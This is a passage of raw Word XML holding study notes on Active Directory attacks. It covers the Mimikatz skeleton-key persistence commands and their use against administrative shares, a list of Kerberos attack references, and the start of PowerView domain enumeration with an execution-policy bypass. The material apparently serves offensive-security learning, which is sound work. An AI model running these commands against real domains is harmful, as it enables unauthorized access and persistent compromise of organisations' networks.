    <w:p w14:paraId="7ACA5C3D" w14:textId="6AB2F149" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>once a skeleton key is implanted the domain controller tries to decrypt the timestamp using both the user NT hash and skeleton key NT hash allowing you access to the domain forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF7421" w14:textId="353629B2" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Preparing</w:t>
      </w:r>
      <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79EA5E8A" w14:textId="1351E300" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477E442D" w14:textId="6E4A634E" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D091E3" w14:textId="0FA7064E" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>20 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246BC8D9" w14:textId="5517D61D" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>skeleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7DE6F0" w14:textId="50059718" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Accessing the forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01824565" w14:textId="6D159B00" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">default credential: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70E849A8" w14:textId="495B1AFC" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. net use c:\\DOMAIN-CONTROLLER\admin$ /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="472705DF" w14:textId="27D8B49C" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>share will be accessible without the need for Admin password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3589C" w14:textId="7F08699C" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> \\Desktop-1\c$ /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user:Machine</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00C88F52" w14:textId="2E8E0068" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>access directory of Desktop-1 without ever knowing what users have access to Desktop-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B2661B" w14:textId="7E8FACD1" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>will not self-persist – can be scripted or persisted using other tools/techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B1011" w14:textId="28B34AB5" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145C51E" w14:textId="1644F16B" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E6A75B8" w14:textId="4FDBCCF4" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2242BC26" w14:textId="1D537CA6" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EE256E3" w14:textId="523E7DE2" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C8F2D30" w14:textId="51A57C99" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.varonis.com/blog/kerberos-authentication-explained/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6454F6F7" w14:textId="2AC4847C" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19F1EF81" w14:textId="299A72A7" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493862736.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="664C35F8" w14:textId="5268E3A9" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="00F82FA4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.redsiege.com/wp-content/uploads/2020/04/20200430-kerb101.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5365FE4C" w14:textId="0B97852F" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="00F82FA4" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0208F454" w14:textId="38B42D23" w:rsidR="00F82FA4" w:rsidRPr="0084205E" w:rsidRDefault="000F2D4A" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Post-Exploitation Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73346783" w14:textId="0F0B8E01" w:rsidR="000F2D4A" w:rsidRPr="0084205E" w:rsidRDefault="000F2D4A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Enumeration with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powerview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46EFB7BE" w14:textId="63EEA9D8" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F8041" w14:textId="1869BCBB" w:rsidR="000F2D4A" w:rsidRPr="0084205E" w:rsidRDefault="000F2D4A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powerview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> is a powerful </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> script from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> empire that can be used for enumerating a domain after shell has been gained in the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A0C28" w14:textId="0EDBD2F3" w:rsidR="000F2D4A" w:rsidRPr="0084205E" w:rsidRDefault="000F2D4A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">put </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powerview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22386090" w14:textId="1506F69D" w:rsidR="000F2D4A" w:rsidRPr="0084205E" w:rsidRDefault="000F2D4A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="472F9238" w14:textId="33C8BE28" w:rsidR="000F2D4A" w:rsidRPr="0084205E" w:rsidRDefault="000F2D4A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733D23C" w14:textId="55B2AE76" w:rsidR="000F2D4A" w:rsidRPr="0084205E" w:rsidRDefault="000F2D4A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">bypasses execution policy of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> allowing </w:t>
      </w:r>
      <w:r w:rsidR="007656CC" w:rsidRPr="0084205E">
        <w:t>easy run of scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBCB85" w14:textId="711A8A34" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powerview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2234CE3A" w14:textId="3453CD73" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>. .\Downloads\PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD82A2" w14:textId="6A9ACB61" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerate domain users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F794478" w14:textId="159B80A2" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09A2966E" w14:textId="1FEC2216" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerate domain groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E457BF" w14:textId="7D35CC41" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>NetGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GroupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> *admin*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E9DACB" w14:textId="020E0946" w:rsidR="007656CC" w:rsidRPr="0084205E" w:rsidRDefault="007656CC" w:rsidP="0084205E">
      <w:pPr>
